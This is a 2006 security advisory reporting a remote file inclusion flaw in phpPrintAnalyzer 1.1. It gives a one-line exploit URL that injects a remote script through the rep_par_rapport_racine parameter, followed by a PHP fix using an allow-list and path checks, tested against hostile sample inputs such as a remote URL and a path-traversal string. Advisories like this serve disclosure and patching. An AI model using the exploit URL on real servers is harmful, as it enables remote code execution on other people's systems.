---------------------------------------------------------------------------------------
phpPrintAnalyzer 1.1 rep_par_rapport_racine Remote File Inclusion
---------------------------------------------------------------------------------------
Author : Sh3ll
Date : 2006/04/27
Location : Iran - Tehran
HomePage : http://www.sh3ll.ir
Email : sh3ll[at]sh3ll[dot]ir
Critical Level : Dangerous
---------------------------------------------------------------------------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : phpPrintAnalyzer
version : 1.1
URL : http://tpequet.free.fr/phpPrintAnalyzer
Description :

phpPrintAnalyzer is a Web Application for CUPS System to Analyze
the "page_log" Files and Get HTML Graphics (with JpGraph)

---------------------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~
The Vulnerable Code Is in index.php:
----------------------------------------index.php--------------------------------------
....

...
---------------------------------------------------------------------------------------
Exploit:
~~~~~~~
http://www.target.com/[phpPrintAnalyzer]/index.php?rep_par_rapport_racine=[Evil Script]

Solution:
~~~~~~~~
Sanitize the Variable $rep_par_rapport_racine in index.php
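
One way to apply this fix, shown as an added example that is not phpPrintAnalyzer source code: the include base is set server-side and any file chosen by the request goes through an allow-list plus a realpath() containment check. The 'summary' key, the resolve_include() helper and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example, not phpPrintAnalyzer source. The 'summary' key and the use of
// this file as the allow-listed target are constructed so the script runs anywhere.

// The include base is fixed server-side and assigned before any include uses
// it, so a request parameter of the same name can never supply it.
define('APP_ROOT', realpath(__DIR__));
$rep_par_rapport_racine = APP_ROOT . DIRECTORY_SEPARATOR;

// Request values may only select a key from this allow-list.
$allowed = ['summary' => basename(__FILE__)];

/**
 * Map a request value to an absolute path inside $root, or null if rejected.
 * Hypothetical helper: the caller would `require` the returned path.
 */
function resolve_include(string $root, array $allowed, $requested): ?string
{
    // Rejects unknown keys, array-typed parameters, URLs and traversal strings.
    if (!is_string($requested) || !isset($allowed[$requested])) {
        return null;
    }
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $path = realpath($prefix . $allowed[$requested]);
    // realpath() returns false for missing files; the prefix comparison
    // rejects symlinks that resolve outside the application root.
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed inputs: one valid key, then values a hostile request could send.
$samples = [
    'summary',
    'http://example.invalid/x.txt',
    '../../etc/passwd',
    ['summary'],
];
foreach ($samples as $value) {
    $path = resolve_include(APP_ROOT, $allowed, $value);
    printf("%-34s => %s\n", json_encode($value),
        $path === null ? 'rejected' : 'would include ' . $path);
}
```

Setting allow_url_include = Off in php.ini (the default since PHP 5.2) additionally stops include/require from fetching URLs.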
----------------------------------------------------------------------------------------
Shoutz:
~~~~~~
~ Special Greetz to My Best Friends Atena & N4sh3n4s
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams